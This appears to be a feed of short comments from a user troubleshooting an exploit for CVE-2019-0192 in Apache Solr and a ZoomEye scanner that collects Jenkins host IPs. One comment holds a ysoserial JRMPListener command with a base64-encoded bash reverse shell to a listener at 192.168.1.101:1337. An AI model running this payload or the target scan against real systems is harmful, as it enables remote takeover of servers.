syriusbughunt
syriusbughunt
``` root@localhost:/home/syrius/solr/CVE-2019-0192# pip3 show requests | grep Version Version: 2.2.1 root@localhost:/home/syrius/solr/CVE-2019-0192# pip3 requests --upgrade ERROR: unknown command "requests" root@localhost:/home/syrius/solr/CVE-2019-0192# pip3 install requests --upgrade Collecting requests Downloading https://files.pythonhosted.org/packages/7d/e3/20f3d364d6c8e5d2353c72a67778eb189176f08e873c9900e10c0287b84b/requests-2.21.0-py2.py3-none-any.whl (57kB) 100% |████████████████████████████████|...
allright will dig to find a way to upgrade and come back to let you know if all is working fine, thanks !
all good, getting connection from the JRMP listener. Trying to get rev shell but no connections yet from netcat listener. Syntax should be (I believe) : java -cp ysoserial-master-SNAPSHOT.jar ysoserial.exploit.JRMPListener...
yep simple cmd works, now rev shell is a little bit more challenging, might need to do something similar to: java -cp ysoserial-master-SNAPSHOT.jar ysoserial.exploit.JRMPListener 1099 Jdk7u21 "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjEuMTAxLzEzMzcgMD4mMQ==}|{base64,-d}|{bash,-i}"
Here's the syntax I've used: python3 zoomeye.py -p 1000 --email [email protected] --password 123456 -s --domain --platform web "'jenkins'"
This is the output I am getting with the latest version: `[*] All IPs will be saved to results_jenkins80.txt [*] Logging in as [email protected] access token: {"access_token": "**************"} [+] Successfuly...
Now with the fix I tried from you above, I am getting the following output: [*] All IPs will be saved to results_jenkins.txt [*] Logging in as [email protected] access token:...
Still getting the same error msg, I will try on one other machine in my LAN
Wow... same issue with the latest version of Ubuntu (the other machine I just tried on) this is weird since you are telling me on your side everything is OK...